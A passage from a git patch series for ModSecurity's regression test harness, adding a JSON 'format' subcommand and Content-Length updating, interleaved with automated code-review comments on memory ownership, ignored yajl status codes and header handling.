} else if (strcmp(key2, "body") == 0) { + copy_body(g, key2, val2); + } + } + yajl_gen_map_close(g); + } else if (strcmp(key, "expected") == 0) { + ensure_obj("expected", val); + 
jayl_gen_string_view(g, "expected"); + yajl_gen_map_open(g); + for (size_t k = 0; k < val->u.object.len; ++k) { + const char *key2 = val->u.object.keys[k]; + yajl_val val2 = val->u.object.values[k]; + if (strcmp(key2, "audit_log") == 0 + || strcmp(key2, "debug_log") == 0 + || strcmp(key2, "error_log") == 0 + || strcmp(key2, "redirect_url") == 0 + || strcmp(key2, "parser_error") == 0) { + copy_string(g, key2, val2); + } else if (strcmp(key2, "http_code") == 0) { + copy_number(g, key2, val2); + } + } + yajl_gen_map_close(g); + } else if (strcmp(key, "rules") == 0) { + copy_str_array(g, key, val); + } + } + yajl_gen_map_close(g); + } + yajl_gen_array_close(g); + + yajl_gen_get_buf(g, &buf, &len); + std::string s{reinterpret_cast(buf), len}; + yajl_gen_free(g); + return s; +} + +#endif // WITH_YAJL + } // namespace modsecurity_test diff --git a/test/regression/regression_test.h b/test/regression/regression_test.h index eb37986723..4444d9352e 100644 --- a/test/regression/regression_test.h +++ b/test/regression/regression_test.h @@ -78,6 +78,19 @@ class RegressionTest { std::string redirect_url; }; +class RegressionTests { + public: + RegressionTests(const yajl_val &node) : node{node} {} + ~RegressionTests(); + static RegressionTests *from_yajl_node(const yajl_val &); + std::string toJSON(); + + std::string filename; + std::string name; + + std::vector tests; + const yajl_val node; +}; class RegressionTestResult { public: From 488370c30a6f135c2863ae33b9fdcfd945bfbe7b Mon Sep 17 00:00:00 2001 From: Hiroaki Nakamura Date: Mon, 26 Jan 2026 05:53:39 +0900 Subject: [PATCH 05/29] Modify RegressionTest and use it for output formatted JSON --- test/common/modsecurity_test.cc | 4 +- test/regression/regression_test.cc | 279 ++++++++++++----------------- test/regression/regression_test.h | 14 +- 3 files changed, 125 insertions(+), 172 deletions(-) diff --git a/test/common/modsecurity_test.cc b/test/common/modsecurity_test.cc index 73406cdd89..1bc2d43bf7 100644 
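Review bot: The `request` branch of `toJSON()` copies `url`, `method`, `http_version`, `headers` and `body`, but the test cases in this series spell the key `"uri"`, and a key that no branch matches is skipped without a message, so formatting a file would silently drop the request URI. The same holds at every level: the if/else chains have no final `else`, so an unexpected or misspelled key vanishes from the rewritten file. Add `uri` to the request keys (`strcmp(key2, "uri") == 0 || strcmp(key2, "method") == 0`, keeping `url` if it is also valid) and end each chain with an `else` that reports the key and aborts, as `copy_number` already does for a type mismatch. Separately, `RegressionTests::from_yajl_node` copies `*RegressionTest::from_yajl_node(obj)` into the vector and never deletes the pointer, which leaks one object per test.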
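Review bot: `RegressionTests` frees `node` in its destructor but keeps the implicitly generated copy constructor, so any copy of the object would free the same yajl tree twice. Deleting it makes the ownership explicit: `RegressionTests(const RegressionTests &) = delete;`. The single-argument constructor should also be `explicit`, and a one-line comment on `node` stating that the object owns the tree and releases it on destruction would explain why `load_test_json` skips `yajl_tree_free` in format mode.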
--- a/test/common/modsecurity_test.cc +++ b/test/common/modsecurity_test.cc @@ -84,10 +84,10 @@ bool ModSecurityTest::load_test_json(const std::string &file) { const auto key = u->filename + ":" + u->name; (*this)[key].push_back(std::move(u)); } - - yajl_tree_free(node); } + yajl_tree_free(node); + return true; } diff --git a/test/regression/regression_test.cc b/test/regression/regression_test.cc index 1d9f1b8ac8..a6d4b7f0b3 100644 --- a/test/regression/regression_test.cc +++ b/test/regression/regression_test.cc @@ -162,6 +162,7 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { } if (strcmp(key2, "body") == 0) { u->request_body = yajl_array_to_str(val2); + u->request_body_lines = yajl_array_to_vec_str(val2); } } } @@ -175,6 +176,7 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { } if (strcmp(key2, "body") == 0) { u->response_body = yajl_array_to_str(val2); + u->response_body_lines = yajl_array_to_vec_str(val2); } if (strcmp(key2, "protocol") == 0) { u->response_protocol = YAJL_GET_STRING(val2); @@ -214,6 +216,7 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { si << keyj << "\n"; } u->rules = si.str(); + u->rules_lines = yajl_array_to_vec_str(val); } } @@ -223,7 +226,7 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { } RegressionTests *RegressionTests::from_yajl_node(const yajl_val &node) { - RegressionTests *u = new RegressionTests(node); + RegressionTests *u = new RegressionTests(); size_t num_tests = node->u.array.len; for ( int i = 0; i < num_tests; i++ ) { yajl_val obj = node->u.array.values[i]; 
@@ -232,94 +235,82 @@ RegressionTests *RegressionTests::from_yajl_node(const yajl_val &node) { return u; } -RegressionTests::~RegressionTests() { -#ifdef WITH_YAJL - yajl_tree_free(node); -#endif -} - #ifdef WITH_YAJL -static yajl_gen_status jayl_gen_string_view(yajl_gen g, std::string_view s) { +static yajl_gen_status gen_string_view(yajl_gen g, std::string_view s) { return yajl_gen_string(g, reinterpret_cast(s.data()), s.length()); } -static yajl_gen_status jayl_gen_key_val(yajl_gen g, std::string_view key, std::string_view val) { - auto s = jayl_gen_string_view(g, key); - if (s != yajl_gen_status_ok) { +static yajl_gen_status gen_key_str(yajl_gen g, std::string_view key, std::string_view val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { return s; } - return jayl_gen_string_view(g, val); + return gen_string_view(g, val); } -static yajl_gen_status copy_number(yajl_gen g, std::string_view key, yajl_val val) { - if (!YAJL_IS_NUMBER(val)) { - std::cerr << "error: " << key << " must be number.\n"; - exit(1); +static yajl_gen_status gen_key_str_if_non_empty(yajl_gen g, std::string_view key, std::string_view val) { + if (val.empty()) { + return yajl_gen_status_ok; } - auto s = jayl_gen_string_view(g, key); - if (s != yajl_gen_status_ok) { + return gen_key_str(g, key, val); +} + +static yajl_gen_status gen_key_int(yajl_gen g, std::string_view key, int val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { return s; } - return yajl_gen_number(g, - reinterpret_cast(val->u.number.r), - strlen(val->u.number.r)); + return yajl_gen_integer(g, val); } -static yajl_gen_status copy_string(yajl_gen g, std::string_view key, yajl_val val) { - if (!YAJL_IS_STRING(val)) { - std::cerr << "error: " << key << " must be string.\n"; - exit(1); +static yajl_gen_status gen_key_opt_int(yajl_gen g, std::string_view key, std::optional val) { + if (!val) { + return yajl_gen_status_ok; } - return jayl_gen_key_val(g, key, val->u.string); + return 
gen_key_int(g, key, val.value()); } -static void ensure_obj(std::string_view key, yajl_val obj) { - if (!YAJL_IS_OBJECT(obj)) { - std::cerr << "error: " << key << " must be object.\n"; - exit(1); +static yajl_gen_status gen_key_int_if_non_zero(yajl_gen g, std::string_view key, int val) { + if (val == 0) { + return yajl_gen_status_ok; } + return gen_key_int(g, key, val); } -static void copy_str_map(yajl_gen g, std::string_view key, yajl_val val) { - if (!YAJL_IS_OBJECT(val)) { - std::cerr << "error: " << key << " must be object.\n"; - exit(1); - } - jayl_gen_string_view(g, key); - yajl_gen_map_open(g); - for (size_t i = 0; i < val->u.object.len; ++i) { - const char *key2 = val->u.object.keys[i]; - yajl_val val2 = val->u.object.values[i]; - copy_string(g, key2, val2); +static yajl_gen_status gen_key_number(yajl_gen g, std::string_view key, std::string_view raw_val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; } - yajl_gen_map_close(g); + return yajl_gen_number(g, reinterpret_cast(raw_val.data()), raw_val.length()); } -static void copy_str_array(yajl_gen g, std::string_view key, yajl_val val) { - if (!YAJL_IS_ARRAY(val)) { - std::cerr << "error: " << key << " must be array.\n"; - exit(1); +static yajl_gen_status gen_key_str_array(yajl_gen g, std::string_view key, const std::vector &lines) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; } - jayl_gen_string_view(g, key); - yajl_gen_array_open(g); - for (size_t i = 0; i < val->u.array.len; ++i) { - yajl_val val2 = val->u.array.values[i]; - if (!YAJL_IS_STRING(val2)) { - std::cerr << "error: array element of " << key << " must be string.\n"; - exit(1); + if (auto s{yajl_gen_array_open(g)}; s != yajl_gen_status_ok) { + return s; + } + for (const auto &line : lines) { + if (auto s{gen_string_view(g, line)}; s != yajl_gen_status_ok) { + return s; } - jayl_gen_string_view(g, val2->u.string); } - yajl_gen_array_close(g); + return yajl_gen_array_close(g); } 
-static void copy_body(yajl_gen g, std::string_view key, yajl_val val) { - if (YAJL_IS_STRING(val)) { - jayl_gen_key_val(g, key, val->u.string); - } else { - copy_str_array(g, key, val); +static yajl_gen_status gen_key_headers(yajl_gen g, std::string_view key, const std::vector> &headers) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + if (auto s{yajl_gen_map_open(g)}; s != yajl_gen_status_ok) { + return s; + } + for (const auto &header : headers) { + if (auto s{gen_key_str(g, header.first, header.second)}; s != yajl_gen_status_ok) { + return s; + } } + return yajl_gen_map_close(g); } std::string RegressionTests::toJSON() { 
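Review bot: `gen_key_str_if_non_empty` and `gen_key_int_if_non_zero` omit the key whenever the value equals the default, so the formatter cannot tell a key that was absent from one that was present with `""` or `0`, and such a key disappears when the file is rewritten. If that is intended it should be stated above the helpers, for example `// Omits the key when val is empty; an explicit "" in the input is not preserved.` and the matching line for zero. The helpers also return a `yajl_gen_status` that the calls visible at the start of the next hunk discard, so a generator error would go unnoticed; marking them `[[nodiscard]]` or checking the result in `toJSON()` would surface it.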
@@ -332,115 +323,73 @@ std::string RegressionTests::toJSON() { return ""; } yajl_gen_config(g, yajl_gen_beautify, 1); - - if (!YAJL_IS_ARRAY(node)) { - std::cerr << "error: toplevel must be array.\n"; - exit(1); - } + yajl_gen_config(g, yajl_gen_indent_string, " "); yajl_gen_array_open(g); - for (size_t i = 0; i < node->u.array.len; ++i) { - yajl_val test_obj = node->u.array.values[i]; - ensure_obj("test", test_obj); + for (const auto & test : tests) { yajl_gen_map_open(g); - for (size_t j = 0; j < test_obj->u.object.len; ++j) { - const char *key = test_obj->u.object.keys[j]; - yajl_val val = test_obj->u.object.values[j]; - if (strcmp(key, "enabled") == 0 - || strcmp(key, "version_min") == 0 - || strcmp(key, "version_max") == 0 - || strcmp(key, "github_issue") == 0) { - copy_number(g, key, val); - } else if (strcmp(key, "title") == 0 - || strcmp(key, "url") == 0 - || strcmp(key, "resource") == 0) { - copy_string(g, key, val); - } else if (strcmp(key, "client") == 0) { - ensure_obj("client", val); - jayl_gen_string_view(g, "client"); - yajl_gen_map_open(g); - for (size_t k = 0; k < val->u.object.len; ++k) { - const char *key2 = val->u.object.keys[k]; - yajl_val val2 = val->u.object.values[k]; - if (strcmp(key2, "ip") == 0) { - copy_string(g, key2, val2); - } else if (strcmp(key2, "port") == 0) { - copy_number(g, key2, val2); - } - } - yajl_gen_map_close(g); - } else if (strcmp(key, "server") == 0) { - ensure_obj("server", val); - jayl_gen_string_view(g, "server"); - yajl_gen_map_open(g); - for (size_t k = 0; k < val->u.object.len; ++k) { - const char *key2 = val->u.object.keys[k]; - yajl_val val2 = val->u.object.values[k]; - if (strcmp(key2, "ip") == 0 - || strcmp(key2, "hostname") == 0) { - copy_string(g, key2, val2); - } else if (strcmp(key2, "port") == 0) { - copy_number(g, key2, val2); - } - } - yajl_gen_map_close(g); - } else if (strcmp(key, "request") == 0) { - ensure_obj("request", val); - jayl_gen_string_view(g, "request"); - yajl_gen_map_open(g); - for 
(size_t k = 0; k < val->u.object.len; ++k) { - const char *key2 = val->u.object.keys[k]; - yajl_val val2 = val->u.object.values[k]; - if (strcmp(key2, "url") == 0 - || strcmp(key2, "method") == 0) { - copy_string(g, key2, val2); - } else if (strcmp(key2, "http_version") == 0) { - copy_number(g, key2, val2); - } else if (strcmp(key2, "headers") == 0) { - copy_str_map(g, key2, val2); - } else if (strcmp(key2, "body") == 0) { - copy_body(g, key2, val2); - } - } - yajl_gen_map_close(g); - } else if (strcmp(key, "response") == 0) { - ensure_obj("response", val); - jayl_gen_string_view(g, "response"); - yajl_gen_map_open(g); - for (size_t k = 0; k < val->u.object.len; ++k) { - const char *key2 = val->u.object.keys[k]; - yajl_val val2 = val->u.object.values[k]; - if (strcmp(key2, "protocol") == 0) { - copy_string(g, key2, val2); - } else if (strcmp(key2, "headers") == 0) { - copy_str_map(g, key2, val2); - } else if (strcmp(key2, "body") == 0) { - copy_body(g, key2, val2); - } - } - yajl_gen_map_close(g); - } else if (strcmp(key, "expected") == 0) { - ensure_obj("expected", val); - jayl_gen_string_view(g, "expected"); - yajl_gen_map_open(g); - for (size_t k = 0; k < val->u.object.len; ++k) { - const char *key2 = val->u.object.keys[k]; - yajl_val val2 = val->u.object.values[k]; - if (strcmp(key2, "audit_log") == 0 - || strcmp(key2, "debug_log") == 0 - || strcmp(key2, "error_log") == 0 - || strcmp(key2, "redirect_url") == 0 - || strcmp(key2, "parser_error") == 0) { - copy_string(g, key2, val2); - } else if (strcmp(key2, "http_code") == 0) { - copy_number(g, key2, val2); - } - } - yajl_gen_map_close(g); - } else if (strcmp(key, "rules") == 0) { - copy_str_array(g, key, val); - } + gen_key_int(g, "enabled", test.enabled); + gen_key_int(g, "version_min", test.version_min); + gen_key_opt_int(g, "version_max", test.version_max); + gen_key_str(g, "title", test.title); + gen_key_str_if_non_empty(g, "url", test.url); + gen_key_str_if_non_empty(g, "resource", test.resource); + 
gen_key_opt_int(g, "github_issue", test.github_issue); + + gen_string_view(g, "client"); + yajl_gen_map_open(g); + gen_key_str(g, "ip", test.clientIp); + gen_key_int(g, "port", test.clientPort); + yajl_gen_map_close(g); + + gen_string_view(g, "server"); + yajl_gen_map_open(g); + gen_key_str(g, "ip", test.serverIp); + gen_key_int(g, "port", test.serverPort); + yajl_gen_map_close(g); + + gen_string_view(g, "request"); + yajl_gen_map_open(g); + gen_key_headers(g, "headers", test.request_headers); + gen_key_str(g, "uri", test.uri); + gen_key_str(g, "method", test.method); + if (!test.httpVersion.empty()) { + gen_key_number(g, "http_version", test.httpVersion); + } + + auto request_body_lines{test.request_body_lines}; + if (request_body_lines.empty()) { + request_body_lines.push_back(""); + } + gen_key_str_array(g, "body", request_body_lines); + + yajl_gen_map_close(g); + + gen_string_view(g, "response"); + yajl_gen_map_open(g); + gen_key_headers(g, "headers", test.response_headers); + + auto response_body_lines{test.response_body_lines}; + if (response_body_lines.empty()) { + response_body_lines.push_back(""); } + gen_key_str_array(g, "body", response_body_lines); + + gen_key_str_if_non_empty(g, "protocol", test.response_protocol); + yajl_gen_map_close(g); + + gen_string_view(g, "expected"); + yajl_gen_map_open(g); + gen_key_str_if_non_empty(g, "audit_log", test.audit_log); + gen_key_str_if_non_empty(g, "debug_log", test.debug_log); + gen_key_str_if_non_empty(g, "error_log", test.error_log); + gen_key_int(g, "http_code", test.http_code); + gen_key_str_if_non_empty(g, "redirect_url", test.redirect_url); + gen_key_str_if_non_empty(g, "parser_error", test.parser_error); + yajl_gen_map_close(g); + + gen_key_str_array(g, "rules", test.rules_lines); + yajl_gen_map_close(g); } yajl_gen_array_close(g); diff --git a/test/regression/regression_test.h b/test/regression/regression_test.h index 4444d9352e..56d4497db6 100644 --- a/test/regression/regression_test.h 
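Review bot: Every `gen_key_*`, `gen_string_view` and `yajl_gen_map_open`/`yajl_gen_map_close` call in the rewritten loop of `RegressionTests::toJSON()` discards its `yajl_gen_status`, even though this patch changes the helpers to return one. A generator error partway through a test case would go unnoticed, and the caller would receive partial output that the `format` subcommand then writes into the test-case file. I would fold the results into one flag, e.g. `auto chk = [&ok](yajl_gen_status s) { ok = ok && s == yajl_gen_status_ok; };`, wrap each call as `chk(gen_key_int(g, "enabled", test.enabled));`, and report failure to the caller when `ok` ends up false. The function starts before this hunk and continues after it, so how the final buffer is read is not visible here.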
+++ b/test/regression/regression_test.h @@ -22,6 +22,7 @@ #include #include #include +#include #ifndef TEST_REGRESSION_REGRESSION_TEST_H_ #define TEST_REGRESSION_REGRESSION_TEST_H_ @@ -43,8 +44,8 @@ class RegressionTest { std::string url; int enabled; int version_min; - int version_max; - int github_issue; + std::optional version_max; + std::optional github_issue; std::vector> request_headers; std::vector> response_headers; @@ -76,12 +77,16 @@ class RegressionTest { int http_code; std::string redirect_url; + + // fields for formatting JSON + + std::vector request_body_lines; + std::vector response_body_lines; + std::vector rules_lines; }; class RegressionTests { public: - RegressionTests(const yajl_val &node) : node{node} {} - ~RegressionTests(); static RegressionTests *from_yajl_node(const yajl_val &); std::string toJSON(); @@ -89,7 +94,6 @@ class RegressionTests { std::string name; std::vector tests; - const yajl_val node; }; class RegressionTestResult { From 37e1f133d72b75bbe2861d5d31fbc9495818061a Mon Sep 17 00:00:00 2001 From: Hiroaki Nakamura Date: Mon, 26 Jan 2026 06:23:22 +0900 Subject: [PATCH 06/29] Update content-length in regeression_tests format subcommand when UPDATE_CONTENT_LENGTH env var is set --- test/common/modsecurity_test.cc | 3 ++ test/common/modsecurity_test.h | 4 ++- test/regression/regression.cc | 3 ++ test/regression/regression_test.cc | 50 ++++++++++++++++++++++++++++++ test/regression/regression_test.h | 2 ++ 5 files changed, 61 insertions(+), 1 deletion(-) diff --git a/test/common/modsecurity_test.cc b/test/common/modsecurity_test.cc index 1bc2d43bf7..19cec4dc51 100644 --- a/test/common/modsecurity_test.cc +++ b/test/common/modsecurity_test.cc @@ -151,6 +151,9 @@ void ModSecurityTest::cmd_options(int argc, char **argv) { i++; m_format = true; } + if (std::getenv("UPDATE_CONTENT_LENGTH")) { + m_update_content_length = true; + } if (std::getenv("AUTOMAKE_TESTS")) { m_automake_output = true; } 
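Review bot: The new `UPDATE_CONTENT_LENGTH` check in `ModSecurityTest::cmd_options` needs a comment saying what the switch does to the test corpus, because it is enabled by mere presence of the variable (an empty value or `0` still turns it on) and it then rewrites headers in every formatted file. Test cases that carry a deliberately mismatched `Content-Length` would presumably be normalised as well, which changes what those cases exercise. Something like `// Opt-in: recompute Content-Length from the body in each formatted test; do not set it for files that rely on a mismatched length.` above the `getenv` call would make that explicit. The enclosing function starts and ends outside the hunk.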
diff --git a/test/common/modsecurity_test.h b/test/common/modsecurity_test.h index 58faa13e95..bc8f138b3b 100644 --- a/test/common/modsecurity_test.h +++ b/test/common/modsecurity_test.h @@ -36,7 +36,8 @@ template class ModSecurityTest : m_automake_output(false), m_count_all(false), m_test_multithreaded(false), - m_format{false} { } + m_format{false}, + m_update_content_length{false} { } std::string header(); void cmd_options(int, char **); @@ -52,6 +53,7 @@ template class ModSecurityTest : bool m_count_all; bool m_test_multithreaded; bool m_format; + bool m_update_content_length; }; } // namespace modsecurity_test diff --git a/test/regression/regression.cc b/test/regression/regression.cc index 8ffdac5d4a..36030a3d4f 100644 --- a/test/regression/regression.cc +++ b/test/regression/regression.cc @@ -450,6 +450,9 @@ int main(int argc, char **argv) std::cerr << "cannot open " << name << " for writing." << std::endl; return 1; } + if (test.m_update_content_length) { + tests[0]->update_content_lengths(); + } ofs << tests[0]->toJSON(); ofs.close(); std::cout << "written formatted JSON to " << name << std::endl; diff --git a/test/regression/regression_test.cc b/test/regression/regression_test.cc index a6d4b7f0b3..da0615e653 100644 --- a/test/regression/regression_test.cc +++ b/test/regression/regression_test.cc @@ -20,6 +20,7 @@ #include #include #include +#include #ifdef WITH_YAJL #include 
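Review bot: In the `format` branch of `main` in regression.cc, `update_content_lengths()` and `toJSON()` run only after the output stream for `name` has been opened for writing, and `toJSON()` has at least one path that returns `""`. If the stream is opened with the default truncating mode, a failed generation leaves an empty test-case file and still prints "written formatted JSON to". Building the text first avoids that: `const std::string json = tests[0]->toJSON();` followed by `if (json.empty()) { std::cerr << "cannot format " << name << std::endl; return 1; }`, placed before the file is opened. `main` begins and ends outside this hunk, so the open call itself is inferred from the "cannot open" context line.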
@@ -225,6 +226,49 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { return u; } +constexpr char ascii_tolower(char c) { + return 'A' <= c && c <= 'Z' ? (c + ('a' - 'A')) : c; +} + +bool iequals_ascii(std::string_view a, std::string_view b) { + return a.size() == b.size() && + std::equal(a.begin(), a.end(), b.begin(), b.end(), + [](char x, char y) { + return ascii_tolower(x) == ascii_tolower(y); + }); +} + +static bool has_chunked_header(const std::vector> &headers) { + for (const auto &header : headers) { + if (iequals_ascii(header.first, "Transfer-Encoding") && iequals_ascii(header.second, "chunked")) { + return true; + } + } + return false; +} + +static void update_content_length(std::vector> &headers, size_t length) { + if (has_chunked_header(headers)) { + return; + } + + bool has_content_length = false; + for (auto &header : headers) { + if (iequals_ascii(header.first, "Content-Length")) { + header.second = std::to_string(length); + has_content_length = true; + } + } + if (!has_content_length) { + headers.push_back(std::pair{"Content-Length", std::to_string(length)}); + } +} + +void RegressionTest::update_content_lengths() { + update_content_length(request_headers, request_body.size()); + update_content_length(response_headers, response_body.size()); +} + RegressionTests *RegressionTests::from_yajl_node(const yajl_val &node) { RegressionTests *u = new RegressionTests(); size_t num_tests = node->u.array.len; @@ -235,6 +279,12 @@ RegressionTests *RegressionTests::from_yajl_node(const yajl_val &node) { return u; } +void RegressionTests::update_content_lengths() { + for (auto & test : tests) { + test.update_content_lengths(); + } +} + #ifdef WITH_YAJL static yajl_gen_status gen_string_view(yajl_gen g, std::string_view s) { diff --git a/test/regression/regression_test.h b/test/regression/regression_test.h index 56d4497db6..6b483c7daf 100644 --- a/test/regression/regression_test.h +++ b/test/regression/regression_test.h 
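Review bot: `has_chunked_header` compares the whole `Transfer-Encoding` value with `chunked`, so a value such as `gzip, chunked`, or one with surrounding whitespace, is not recognised. `update_content_length` then adds or rewrites `Content-Length` on a message that is chunk-framed, and the formatted test case ends up carrying both framing headers, which is a different input to the engine than the author wrote. I would match on the last comma-separated coding after trimming, as sketched below. Whether any existing test case uses such a value cannot be seen from this hunk.

```cpp
// Transfer-Encoding is a comma-separated list; chunked framing applies
// when chunked is the final coding.
static bool ends_with_chunked(std::string_view value) {
    const auto comma = value.rfind(',');
    if (comma != std::string_view::npos) {
        value.remove_prefix(comma + 1);
    }
    while (!value.empty() && (value.front() == ' ' || value.front() == '\t')) {
        value.remove_prefix(1);
    }
    while (!value.empty() && (value.back() == ' ' || value.back() == '\t')) {
        value.remove_suffix(1);
    }
    return iequals_ascii(value, "chunked");
}

// … unchanged: loop over headers in has_chunked_header …
        if (iequals_ascii(header.first, "Transfer-Encoding") && ends_with_chunked(header.second)) {
```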
@@ -83,11 +83,13 @@ class RegressionTest { std::vector request_body_lines; std::vector response_body_lines; std::vector rules_lines; + void update_content_lengths(); }; class RegressionTests { public: static RegressionTests *from_yajl_node(const yajl_val &); + void update_content_lengths(); std::string toJSON(); std::string filename; From 191dba923fb15366d558af1586dce5ce0c6a94e6 Mon Sep 17 00:00:00 2001 
From: Hiroaki Nakamura Date: Mon, 26 Jan 2026 08:51:57 +0900 Subject: [PATCH 07/29] Format regression test JSON files by running the following command: ``` (cd test; ./regression_tests format) ``` --- test/test-cases/regression/action-allow.json | 157 +- test/test-cases/regression/action-block.json | 103 +- .../regression/action-ctl_audit_engine.json | 19 +- .../action-ctl_request_body_access.json | 177 +- .../action-ctl_request_body_processor.json | 257 +- ...ctl_request_body_processor_urlencoded.json | 134 +- .../regression/action-ctl_rule_engine.json | 462 +- .../action-ctl_rule_remove_by_id.json | 110 +- .../action-ctl_rule_remove_by_tag.json | 108 +- .../action-ctl_rule_remove_target_by_id.json | 309 +- .../action-ctl_rule_remove_target_by_tag.json | 166 +- .../regression/action-disruptive.json | 228 +- test/test-cases/regression/action-exec.json | 237 +- .../regression/action-expirevar.json | 216 +- test/test-cases/regression/action-id.json | 298 +- .../test-cases/regression/action-initcol.json | 52 +- test/test-cases/regression/action-msg.json | 172 +- test/test-cases/regression/action-setenv.json | 156 +- test/test-cases/regression/action-setrsc.json | 52 +- test/test-cases/regression/action-setsid.json | 52 +- test/test-cases/regression/action-setuid.json | 52 +- test/test-cases/regression/action-skip.json | 156 +- test/test-cases/regression/action-tag.json | 170 +- .../regression/action-tnf-base64.json | 102 +- test/test-cases/regression/action-xmlns.json | 217 +- test/test-cases/regression/actions.json | 164 +- test/test-cases/regression/auditlog.json | 205 +- .../collection-case-insensitive.json | 85 +- .../test-cases/regression/collection-lua.json | 428 +- ...llection-regular_expression_selection.json | 171 +- .../regression/collection-resource.json | 148 +- .../regression/collection-tx-with-macro.json | 364 +- test/test-cases/regression/collection-tx.json | 477 +- .../regression/config-body_limits.json | 943 +-- .../config-calling_phases_by_name.json 
| 109 +- .../regression/config-include-bad.json | 148 +- .../test-cases/regression/config-include.json | 480 +- .../regression/config-remove_by_id.json | 162 +- .../regression/config-remove_by_msg.json | 108 +- .../regression/config-remove_by_tag.json | 108 +- .../regression/config-response_type.json | 170 +- .../regression/config-secdefaultaction.json | 492 +- .../regression/config-secremoterules.json | 145 +- .../config-update-action-by-id.json | 410 +- .../config-update-target-by-id.json | 285 +- .../config-update-target-by-msg.json | 51 +- .../config-update-target-by-tag.json | 465 +- .../config-xml_external_entity.json | 181 +- test/test-cases/regression/debug_log.json | 28 +- .../regression/directive-sec_rule_script.json | 351 +- .../test-cases/regression/fn-setHostname.json | 46 +- test/test-cases/regression/issue-1152.json | 68 +- test/test-cases/regression/issue-1528.json | 80 +- test/test-cases/regression/issue-1565.json | 159 +- test/test-cases/regression/issue-1576.json | 153 +- test/test-cases/regression/issue-1591.json | 245 +- test/test-cases/regression/issue-1725.json | 84 +- test/test-cases/regression/issue-1743.json | 156 +- test/test-cases/regression/issue-1785.json | 17 +- test/test-cases/regression/issue-1812.json | 20 +- test/test-cases/regression/issue-1825.json | 441 +- test/test-cases/regression/issue-1831.json | 82 +- test/test-cases/regression/issue-1844.json | 307 +- test/test-cases/regression/issue-1850.json | 17 +- test/test-cases/regression/issue-1941.json | 139 +- test/test-cases/regression/issue-1943.json | 49 +- test/test-cases/regression/issue-1956.json | 292 +- test/test-cases/regression/issue-1960.json | 47 +- test/test-cases/regression/issue-2000.json | 54 +- test/test-cases/regression/issue-2099.json | 399 +- test/test-cases/regression/issue-2111.json | 56 +- test/test-cases/regression/issue-2196.json | 54 +- test/test-cases/regression/issue-2296.json | 681 +- .../regression/issue-2423-msg-in-chain.json | 196 +- 
test/test-cases/regression/issue-2427.json | 114 +- test/test-cases/regression/issue-3340.json | 12 +- test/test-cases/regression/issue-394.json | 78 +- test/test-cases/regression/issue-849.json | 40 +- test/test-cases/regression/issue-960.json | 208 +- .../misc-variable-under-quotes.json | 115 +- test/test-cases/regression/misc.json | 43 +- .../regression/offset-variable.json | 2639 +++++--- .../operator-UnconditionalMatch.json | 51 +- .../regression/operator-detectsqli.json | 51 +- .../regression/operator-detectxss.json | 53 +- .../regression/operator-fuzzyhash.json | 358 +- .../regression/operator-inpectFile.json | 564 +- .../regression/operator-ipMatchFromFile.json | 155 +- test/test-cases/regression/operator-pm.json | 79 +- .../regression/operator-pmfromfile.json | 15 +- test/test-cases/regression/operator-rx.json | 334 +- .../regression/operator-rxGlobal.json | 51 +- .../operator-validate-byte-range.json | 51 +- .../regression/operator-verifycc.json | 51 +- .../regression/operator-verifycpf.json | 51 +- .../regression/operator-verifyssn.json | 51 +- .../regression/operator-verifysvnr.json | 51 +- .../regression/request-body-parser-json.json | 337 +- .../request-body-parser-multipart-crlf.json | 103 +- .../request-body-parser-multipart.json | 5874 +++++++++-------- .../request-body-parser-xml-validade-dtd.json | 256 +- .../regression/request-body-parser-xml.json | 326 +- test/test-cases/regression/rule-920120.json | 61 +- test/test-cases/regression/rule-920200.json | 58 +- test/test-cases/regression/rule-920274.json | 52 +- .../regression/sec_component_signature.json | 32 +- test/test-cases/regression/secaction.json | 27 +- .../regression/secargumentslimit.json | 92 +- test/test-cases/regression/secmarker.json | 54 +- test/test-cases/regression/secruleengine.json | 190 +- .../regression/transformation-none.json | 54 +- .../regression/transformations.json | 56 +- test/test-cases/regression/variable-ARGS.json | 402 +- .../variable-ARGS_COMBINED_SIZE.json | 412 
+- .../regression/variable-ARGS_GET.json | 364 +- .../regression/variable-ARGS_GET_NAMES.json | 115 +- .../regression/variable-ARGS_NAMES.json | 320 +- .../regression/variable-ARGS_POST.json | 156 +- .../regression/variable-ARGS_POST_NAMES.json | 277 +- .../regression/variable-AUTH_TYPE.json | 103 +- .../regression/variable-DURATION.json | 52 +- test/test-cases/regression/variable-ENV.json | 221 +- .../test-cases/regression/variable-FILES.json | 119 +- .../variable-FILES_COMBINED_SIZE.json | 63 +- .../regression/variable-FILES_NAMES.json | 63 +- .../regression/variable-FILES_SIZES.json | 63 +- .../regression/variable-FULL_REQUEST.json | 63 +- .../variable-FULL_REQUEST_LENGTH.json | 63 +- test/test-cases/regression/variable-GEO.json | 1264 ++-- .../regression/variable-HIGHEST_SEVERITY.json | 115 +- .../variable-INBOUND_DATA_ERROR.json | 120 +- .../regression/variable-MATCHED_VAR.json | 292 +- .../regression/variable-MATCHED_VARS.json | 348 +- .../variable-MATCHED_VARS_NAMES.json | 291 +- .../regression/variable-MATCHED_VAR_NAME.json | 408 +- .../regression/variable-MODSEC_BUILD.json | 52 +- .../variable-MULTIPART_CRLF_LF_LINES.json | 127 +- .../variable-MULTIPART_FILENAME.json | 127 +- ...able-MULTIPART_INVALID_HEADER_FOLDING.json | 92 +- .../regression/variable-MULTIPART_NAME.json | 127 +- .../variable-MULTIPART_PART_HEADERS.json | 339 +- .../variable-MULTIPART_STRICT_ERROR.json | 503 +- ...variable-MULTIPART_UNMATCHED_BOUNDARY.json | 63 +- .../variable-OUTBOUND_DATA_ERROR.json | 120 +- .../regression/variable-PATH_INFO.json | 241 +- .../regression/variable-QUERY_STRING.json | 164 +- .../regression/variable-REMOTE_ADDR.json | 116 +- .../regression/variable-REMOTE_HOST.json | 116 +- .../regression/variable-REMOTE_PORT.json | 116 +- .../regression/variable-REMOTE_USER.json | 58 +- 